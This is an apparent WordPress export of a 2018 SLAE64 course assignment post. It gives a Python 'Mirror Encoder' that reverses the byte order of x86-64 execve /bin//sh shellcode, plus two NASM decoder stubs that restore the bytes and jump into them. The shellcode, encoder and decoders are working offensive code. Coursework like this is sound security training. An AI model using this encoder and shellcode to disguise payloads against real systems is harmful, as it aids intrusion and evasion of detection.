{"id":210,"date":"2018-02-25T11:40:32","date_gmt":"2018-02-25T10:40:32","guid":{"rendered":"http:\/\/pentester.blog\/?p=210"},"modified":"2019-08-18T19:48:26","modified_gmt":"2019-08-18T17:48:26","slug":"slae64-assignment-4-encoder-decoder-shellcode","status":"publish","type":"post","link":"https:\/\/hacktarus.fr\/?p=210","title":{"rendered":"SLAE64 – Assignment #4 – Encoder\/Decoder Shellcode"},"content":{"rendered":"

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :<\/p>\n

http:\/\/www.securitytube-\u00adtraining.com\/online-\u00adcourses\/x8664-\u00adassembly-\u00adand-\u00adshellcoding-\u00adon-\u00adlinux\/index.html<\/p>\n

Student ID: PA-6470<\/p>\n

Assignment #4<\/h2>\n

The aim of this assignment is to write a custom shellcode encoder and decoder.<\/p>\n

The first thing to do is to dump all the opcodes of the shellcode and think to a way to mix all of them.<\/p>\n

Here I’ve chosen a simple but effective\u00a0algorithm. The encoder starts to swap the first and last opcode then continues to swap opcodes until it reaches the middle of the opcodes. My implementation only works if there is an even number of opcodes. If not, you just need to add\u00a0 one dummy opcode like a NOP. I’ve called this encoder, the \u00ab\u00a0Mirror Encoder\u00a0\u00bb.<\/p>\n

Here is a simple diagram showing how this algorithm works :<\/p>\n

\"\"<\/p>\n

Encoder<\/h2>\n

Here is a screenshot of this running encoder and the encoded shellcode :<\/p>\n

\"\"<\/p>\n

Mirror-Encoder.py :<\/p>\n

#!\/usr\/bin\/python\r\n\r\n# This shellcode encoder has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :\r\n# http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html\r\n#\r\n# Author : SLAE64-PA-6470 (kahlon81)\r\n\r\n# python Mirror-Encoder.py \r\n\r\nshellcode = (\"\\x48\\x31\\xc0\\x50\\x48\\xbb\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x53\\x48\\x89\\xe7\\x50\\x48\\x89\\xe2\\x57\\x48\\x89\\xe6\\x48\\x83\\xc0\\x3b\\x0f\\x05\")\r\n\r\nencoded = \"\"\r\nencoded2 = \"\"\r\nr2 = \"\"\r\nl2 = \"\"\r\nrr2 = \"\"\r\nll2 = \"\"\r\n\r\nprint 'Len: %d' % len(bytearray(shellcode))\r\nprint 'Encoded shellcode ...'\r\n\r\narr = bytearray(shellcode)\r\narr2 = [(arr[i], arr[-i-1]) for i in range(len(arr) \/\/ 2)]\r\n#print arr2\r\n\r\nfor x in range(len(arr2)):\r\n  y = arr2[x]\r\n\r\n  # encode for C\r\n  r = '\\\\x'\r\n  r += '%02x' % y[0]\r\n  r2 = r + r2\r\n\r\n  l = '\\\\x'\r\n  l += '%02x' % y[1]\r\n  l2 = l2 + l\r\n\r\n  # encode for ASM\r\n  r = '0x'\r\n  r += '%02x,' % y[0]\r\n  rr2 = r + rr2\r\n\r\n  l = '0x'\r\n  l += '%02x,' % y[1]\r\n  ll2 = ll2 + l\r\n\r\n# Build encoded strings\r\nencoded = l2 + r2\r\nencoded2 = ll2 + rr2\r\n\r\nprint 'opcodes for C :'\r\nprint encoded\r\nprint 'opcodes for ASM :'\r\nprint encoded2\r\n<\/pre>\n
Decoder<\/h3>\n
The decoder is written in assemby and just do the reverse swap.<\/p>\n
Here is a screenshot of the running decoder. It decodes the previously encoded shellcode and run it :<\/p>\n
\"\"<\/p>\n
The code is self-explanatory, 2 versions available.<\/p>\n
Full source code is available here and on my\u00a0Github<\/a>\u00a0account.<\/p>\n
Version 1<\/h3>\n
; This shellcode decoder has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :\r\n; http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html\r\n;\r\n; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; $ nasm -f elf64 Mirror-Decoder.nasm -o Mirror-Decoder.o\r\n; $ ld Mirror-Decoder.o -o Mirror-Decoder\r\n\r\nglobal _start\r\n\r\nsection .data\r\nencoded_sc:\tdb 0x05,0x0f,0x3b,0xc0,0x83,0x48,0xe6,0x89,0x48,0x57,0xe2,0x89,0x48,0x50,0xe7,0x89,0x48,0x53,0x68,0x73,0x2f,0x2f,0x6e,0x69,0x62,0x2f,0xbb,0x48,0x50,0xc0,0x31,0x48\r\nencoded_sc_size equ $ - encoded_sc\r\n\r\nsection .text\r\n_start:\r\n\tlea r8, [rel encoded_sc]\r\n\txor rcx, rcx                 ; offset to first SC byte\r\n\tmov rdx, encoded_sc_size - 1 ; offset to last SC byte = SC length -1         \r\n\tmov r9, encoded_sc_size\t     ; r9 = SC size \/ 2\r\n\tshr r9, 1\r\ndecode:\r\n\tcmp rcx, r9                  ; SC length \/ 2 - stop swapping bytes when we are in the middle\r\n\tje encoded_sc                ; go to decoded shellcode\r\n\t\r\n\tmov al, byte [r8+rcx]        ; save values\r\n\tmov bl, byte [r8+rdx]\r\n\r\n\tmov byte [r8+rcx], bl        ; swap values\r\n\tmov byte [r8+rdx], al\r\n  \r\n\tinc rcx                      ; go to next byte from left to right\r\n\tdec rdx                      ; go to next byte from right to left\r\n        jmp short decode                 \r\n<\/pre>\n
Version 2 (JUMP-CALL-POP)<\/h3>\n
; This shellcode decoder has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification :\r\n; http:\/\/www.securitytube-training.com\/online-courses\/x8664-assembly-and-shellcoding-on-linux\/index.html\r\n;\r\n; Author : SLAE64-PA-6470 (kahlon81)\r\n; Date : 2018\/02\/21\r\n;\r\n; $ nasm -f elf64 Mirror-Decoder.nasm -o Mirror-Decoder.o\r\n; $ ld Mirror-Decoder.o -o Mirror-Decoder\r\n\r\nglobal _start\r\n\r\nsection .text   \r\n_start:\t\r\n        jmp ONSTACK   \r\nGO_LOOP:\r\n        pop r8                       ; r8 is the SC address. pop esi crash ?;\r\n\txor rcx, rcx                 ; offset to first SC byte\r\n\tmov rdx, SC_SIZE - 1         ; offset to last SC byte = SC length -1         \r\n\tmov r9, SC_SIZE\t\t     ; r9 = SC_SIZE \/ 2\r\n\tshr r9, 1\r\nLOOP:\r\n\tcmp rcx, r9                  ; SC length \/ 2 - stop swapping bytes when we are in the middle\r\n\tje SC                        ; go to decoded shell code\r\n\t\r\n\tmov al, byte [r8+rcx]        ; save values\r\n\tmov bl, byte [r8+rdx]\r\n\r\n\tmov byte [r8+rcx], bl        ; swap values\r\n\tmov byte [r8+rdx], al\r\n  \r\n\tinc rcx                      ; go to next byte from left to right\r\n\tdec rdx                      ; go to next byte from right to left\r\n        jmp LOOP                 \r\nsection .data\r\nONSTACK:\r\n\tcall GO_LOOP\r\nSC:\tdb 0x05,0x0f,0x3b,0xc0,0x83,0x48,0xe6,0x89,0x48,0x57,0xe2,0x89,0x48,0x50,0xe7,0x89,0x48,0x53,0x68,0x73,0x2f,0x2f,0x6e,0x69,0x62,0x2f,0xbb,0x48,0x50,0xc0,0x31,0x48\r\nSC_SIZE equ $ - SC\r\n<\/pre>\n","protected":false},"excerpt":{"rendered":"
This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification : http:\/\/www.securitytube-\u00adtraining.com\/online-\u00adcourses\/x8664-\u00adassembly-\u00adand-\u00adshellcoding-\u00adon-\u00adlinux\/index.html Student ID: PA-6470 Assignment #4 The aim of this assignment is to write a custom shellcode encoder and decoder. The first thing to do is to dump all the opcodes of the shellcode and think to … Continuer la lecture de SLAE64 – Assignment #4 – Encoder\/Decoder Shellcode<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-210","post","type-post","status-publish","format-standard","hentry","category-slae64"],"_links":{"self":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/210","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=210"}],"version-history":[{"count":12,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/210\/revisions"}],"predecessor-version":[{"id":299,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=\/wp\/v2\/posts\/210\/revisions\/299"}],"wp:attachment":[{"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=210"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=210"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hacktarus.fr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=210"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}